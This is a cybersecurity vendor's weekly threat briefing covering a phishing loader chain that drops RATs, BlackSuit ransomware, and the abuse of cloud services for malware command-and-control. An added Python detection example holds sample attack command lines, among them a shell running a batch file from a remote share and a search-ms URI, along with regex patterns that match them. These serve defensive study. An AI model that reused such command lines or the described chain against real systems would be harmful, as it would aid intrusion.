Threat Briefing — Aug 9, 2024

Weekly Threat Briefing - Aug 5 - Aug 9

TLP: CLEAR - This information may be shared publicly

eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.

Noteworthy News

PureHVNC Deployed via Python Multi-stage Loader

Bottom Line: Both eSentire and Fortinet have observed an email-based campaign delivering a multi-stage loader, leading to the deployment of a variety of malware. Organizations must be aware of sophisticated social engineering threats, implementing both human and technical controls.

On August 8th, FortiGuard Labs released a report on a phishing campaign targeting employees, posing as a customer in urgent need of a service. The email contained a malicious attachment that, when opened, deployed malware such as XWorm, Venom RAT, AsyncRAT, and PureHVNC. They were all observed utilizing packing and obfuscation techniques like the Python obfuscator 'Kramer,' shellcode generator 'Donut,' and shellcode loader 'laZzzy' to evade detection.

The attack flow consists of several intricate steps, starting with an email masquerading as a customer inquiry. The attack escalates when the victim opens an HTML attachment that triggers the execution of hidden malicious code in LNK files via the "search-ms" functionality. Employing obfuscation techniques, the attack progresses with the execution of a remote batch file named 'new.bat' disguised as a decoy PDF, leading to the download and extraction of Python programs. These Python files use tools such as 'Kramer' and 'Donut' to decode and execute shellcode while evading detection mechanisms such as AMSI/WLDP. The shellcode loader 'laZzzy' further conceals malicious activity by injecting shellcode into legitimate processes such as 'notepad.exe,' ultimately executing the final payload: XWorm, Venom RAT, AsyncRAT, and PureHVNC.
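On the endpoint, the loader chain above appears as a sequence of process creations: a browser or mail client handing a search-ms URI to explorer.exe, a shell running a batch file from a remote path, and a Python interpreter started from a user-writable directory. The following Python is an added illustration, not code from the FortiGuard or eSentire reports: it runs three stage heuristics over constructed, simplified process-creation events; the field names, sample paths and the documentation-range address are assumptions.

```python
import re

# Constructed sample events (Sysmon-style fields, simplified); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "outlook.exe", "image": "msedge.exe",
     "cmdline": r'msedge.exe "C:\Users\u\Downloads\Inquiry.html"'},
    {"parent": "msedge.exe", "image": "explorer.exe",
     "cmdline": r'explorer.exe "search-ms:query=Inquiry&crumb=location:\\203.0.113.10\share"'},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c \\203.0.113.10\share\new.bat'},
    {"parent": "cmd.exe", "image": "python.exe",
     "cmdline": r'C:\Users\Public\py\python.exe loader.py'},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r'notepad.exe C:\Users\u\notes.txt'},  # benign control event
]

CLIENT_APPS = {"msedge.exe", "chrome.exe", "firefox.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe"}
REMOTE_PATH = re.compile(r'\\\\[^\\\s"]+\\')                 # \\host\share... (UNC/WebDAV)
SCRIPT_EXT = re.compile(r'\.(bat|cmd|vbs|js|ps1)(\b|$)', re.I)
USER_WRITABLE = re.compile(r'^"?c:\\(users|programdata|windows\\temp)\\', re.I)

def search_ms_from_client(e):
    """Stage 1: explorer.exe handling a search-ms: URI spawned by a browser/mail client."""
    return (e["image"] == "explorer.exe" and "search-ms:" in e["cmdline"].lower()
            and e["parent"] in CLIENT_APPS)

def remote_script_execution(e):
    """Stage 2: a shell executing a script file that lives on a remote share."""
    return (e["image"] in SHELLS and REMOTE_PATH.search(e["cmdline"]) is not None
            and SCRIPT_EXT.search(e["cmdline"]) is not None)

def interpreter_from_user_path(e):
    """Stage 3: a Python interpreter launched by a shell from a user-writable directory."""
    return (e["image"] in {"python.exe", "pythonw.exe"} and e["parent"] in SHELLS
            and USER_WRITABLE.match(e["cmdline"]) is not None)

RULES = [("search-ms URI handed to explorer.exe by a client app", search_ms_from_client),
         ("shell running a script from a remote UNC/WebDAV path", remote_script_execution),
         ("Python interpreter started from a user-writable path", interpreter_from_user_path)]

def evaluate(events):
    """Return (event index, rule name) for every hit, in event order."""
    return [(i, name) for i, e in enumerate(events) for name, pred in RULES if pred(e)]

def chain_score(events):
    """Distinct stages seen; 3 means every stage of the documented chain was observed."""
    return len({name for _, name in evaluate(events)})

if __name__ == "__main__":
    for i, name in evaluate(SAMPLE_EVENTS):
        print(f"event {i}: {name}")
```

Each rule alone will fire on some legitimate activity; the value is in the full chain appearing in order on one host within a short window, so alert on the combined score rather than on individual stages.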

The PureHVNC malware gathers victim information, communicates with a Command-and-Control (C2) server, and targets specific applications like crypto wallets and password managers. It utilizes plugins such as PluginRemoteDesktop and PluginExecuting to execute additional files, update the program, and collect sensitive data. These plugins handle various commands, including downloading and executing files, restarting connections, and manipulating victim systems to serve the attacker's objectives.

eSentire Threat Intelligence Analysis:

The ongoing evolution of cyber threats underscores the need for a multi-faceted approach to cybersecurity defense. Threat actors' use of TryCloudflare to conceal their malicious activities represents a notable shift towards leveraging trusted cloud services for nefarious purposes. By routing traffic through Cloudflare's infrastructure, attackers can evade traditional detection mechanisms. This tactic, combined with the deployment of sophisticated malware like XWorm, AsyncRAT, VenomRAT, and PureLogs Stealer, demonstrates a significant escalation in the complexity and sophistication of modern cyberattacks.

The exploitation of human psychology and trust through convincing email lures further emphasizes the crucial role of user awareness training in mitigating cybersecurity risks. As attackers craft increasingly convincing messages to deceive recipients into unwittingly engaging with malicious content, the importance of vigilance and skepticism when interacting with digital communication cannot be overstated. Organizations must enhance their training programs and promote a culture of cyber resilience to empower individuals to recognize and respond effectively to social engineering tactics.

In addition to the insights provided by FortiGuard Labs, eSentire has also contributed valuable findings to the cybersecurity landscape. The report titled "Quartet of Trouble: XWorm, AsyncRAT, VenomRAT, and PureLogs Stealer Leverage TryCloudflare" was released on July 31, 2024, shedding light on a multi-stage attack impacting a government industry client. The convergence of findings from both entities indicates a concerning rise in the prevalence of these sophisticated attacks, suggesting that this emerging threat may be here to stay. The parallel analyses underscore the urgency for organizations to fortify their defenses and adopt proactive strategies to defend against the escalating complexity and persistence of cyber threats.

Furthermore, the analysis of the eSentire and FortiGuard Labs reports illuminates the challenges in accurately attributing specific malware variants and understanding their capabilities. The distinction between PureLogs Stealer and PureHVNC, as highlighted in the reports, underscores the nuanced nature of threat intelligence analysis and the importance of identifying and acting upon Indicators of Compromise (IoCs). By staying abreast of emerging threat trends, leveraging comprehensive threat intelligence, and fostering a proactive cybersecurity posture, organizations can better defend against the relentless innovation and sophistication of modern cyber threats.

#StopRansomware: BlackSuit (Royal) Ransomware

Bottom Line: CISA has confirmed that the BlackSuit ransomware is a rebranding of the Royal ransomware group. BlackSuit is highly active, targeting a variety of industries around the globe, with ransom demands ranging from $1 million to $10 million USD.

The Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the FBI, has updated the #StopRansomware advisory for BlackSuit ransomware. The report now includes additional Indicators of Compromise (IoCs), known attacker Tactics, Techniques, and Procedures (TTPs), and attribution to the now-defunct ransomware group Royal. The Royal ransomware group was active from September 2022 through June 2023, slightly overlapping with the emergence of BlackSuit ransomware in May 2023. The two ransomware types share significant code similarities, with notable improvements made to the BlackSuit version. BlackSuit is a closed Ransomware-as-a-Service (RaaS) operation, meaning that affiliates deploy the ransomware in attacks, but the group is difficult for affiliates to join, requiring a proven track record of cybercrime.

The BlackSuit group employs a variety of means for gaining initial access into victim organizations. BlackSuit affiliates have been observed using phishing emails with attached malicious PDFs, Remote Desktop Protocol (RDP) compromise, exploitation of vulnerabilities in public-facing applications, and access purchased from third parties. According to the August 7th report update, phishing emails are “the most successful vectors for initial access by BlackSuit threat actors”.

After initial access, threat actors disable antivirus software, exfiltrate victim data, and deploy the ransomware payload. Data is stolen from victim organizations to enable the double extortion technique, where stolen information is used for extra leverage during ransom negotiations. If the ransom demand is not met, the data is then posted to the BlackSuit leak site.

There has recently been an increase in the number of BlackSuit ransomware events in which victims receive either phone or email communications from the BlackSuit actors regarding the breach and ransom demand. Public reports state that multiple hospitals have disclosed that the BlackSuit ransomware actors directly contacted hospital patients and customers.

BlackSuit ransom demands generally range from $1 million to $10 million USD, although the largest recorded demand by the group reached $60 million USD. According to CISA, the group has demanded over $500 million in total ransom demands across all victims. While ransom demands are high, compared to other groups, BlackSuit has demonstrated a willingness to negotiate with victims, leading to much lower ransom payments. Paying for decryption is not recommended. The FBI states that, “paying a ransom doesn’t guarantee you or your organization will get any data back. It also encourages perpetrators to target more victims and offers an incentive for others to get involved in this type of illegal activity.”

eSentire Threat Intelligence Analysis:

The rebranding of ransomware groups is not a new tactic. It has been employed by a wide variety of ransomware groups in the past (e.g., Conti, BlackMatter). There are two primary reasons that ransomware groups employ this technique. The first is to limit law-enforcement attention, especially after a high-profile attack; this was observed in the case of Darkside’s attack on Colonial Pipeline in 2021, after which the group rebranded under the name BlackMatter. The second is to perform an exit scam, where ring leaders take all the funds without paying their affiliates, as illustrated by BlackCat ransomware’s shutdown. It should be noted that BlackCat is also a rebranding of BlackMatter, connecting the mentioned groups together.

The tactic of calling and emailing victims and customers is notable. This strategy is meant to apply further pressure on victim organizations to pay the ransom demand, as the contacted customers will then reach out to the organization and potentially the media. Sophos Field CTO Chester Wisniewski publicly stated that the tactic is not effective, as ransomware victims choose whether to pay a ransom demand based on other factors such as downtime and regulatory concerns. While the effectiveness is in question, the additional negative impact on the victim organization is not. By contacting customers or business partners, the attackers increase the reputational damage to the victim organization.

Organizations are strongly recommended to deploy an Endpoint Detection and Response (EDR) product across all workstations and servers, to enable the rapid identification and remediation of threats before they escalate to ransomware deployment. CISA provides a number of other recommendations, including network segmentation, adoption of Multi-Factor Authentication (MFA), and regularly auditing systems and applying security patches. For a full list of recommendations, see the #StopRansomware report.

In response to the updated #StopRansomware report, eSentire’s Threat Intelligence team has performed threat hunts based on the shared Indicators of Compromise (IoCs). eSentire MDR for Endpoint detects activity associated with ransomware precursors and deployment. Both eSentire MDR for Endpoint and MDR for Network detect tools known to be employed in BlackSuit ransomware cases.

How Malicious Actors Are Leveraging Cloud Services

Bottom Line: Many modern organizations utilize legitimate cloud platforms in day-to-day operations. Threat actors can leverage this to blend malicious activity into common operations, hosting command-and-control or exfiltration infrastructure on trusted services.

Symantec's Threat Hunter Team has discovered new backdoors and exfiltration tools being used by threat actors leveraging legitimate cloud services. This indicates a growing trend among attackers to exploit cloud infrastructure for both espionage and financially motivated operations globally. Commonly abused cloud services include Microsoft Outlook, Google Drive, AWS, and OneDrive. Threat actors are using these services to host malicious payloads and for command-and-control (C2).

The report includes five examples of recent campaigns involving cloud infrastructure and multiple previously unidentified malware types. In November 2023, a new backdoor dubbed GoGra, which uses Microsoft Outlook for its C2 channel, was identified impacting a media organization in South Asia. The Firefly espionage group was discovered using a previously unseen data exfiltration tool, tracked as Google Drive Exfiltration, which uploads victim data to Google Drive. Grager, another previously unseen backdoor, was recently discovered targeting organizations in Taiwan, Hong Kong, and Vietnam; its C2 servers were hosted on Microsoft OneDrive. The MoonTag backdoor employs the Microsoft Graph API; this tool is still in development but was discovered due to uploads to the online file-scanning and malware repository VirusTotal. The final cloud-related malware included in the report is Onedrivetools, a multi-stage backdoor used to target IT companies in the U.S. and Europe. The first stage of the malware is a loader that authenticates to the Microsoft Graph API, and the second stage is then downloaded from OneDrive.

To defend against similar attacks, organizations are recommended to block cloud services that are not actively used in the organization, monitor critical assets for data exfiltration, and ensure Endpoint Detection and Response (EDR) capabilities are deployed to all workstations and servers to identify malicious activity.

eSentire Threat Intelligence Analysis:

Both financially motivated threat actors and state-sponsored APT groups are relying on cloud infrastructure in their attacks. According to the Symantec report, cloud abuse has become increasingly common over the last year. Cloud infrastructure has become a popular option for threat actors due to ease of use, cost, and the inherent trust in large cloud providers. As services like Google Drive and OneDrive are common across businesses, malicious use of these services is less likely to be automatically detected and will not stand out to human analysts as unusual.

The eSentire Threat Intelligence team expects the trend of cloud service abuse for malware delivery and C2 infrastructure to continue and increase through 2024. The eSentire Threat Intelligence team has performed threat hunts for relevant Indicators of Compromise and blocked known malicious infrastructure via the eSentire Global Blocklist. Research into new detection opportunities for the threats in this report is ongoing.

About the threat briefings:

The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.

eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research, and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and cybersecurity acumen.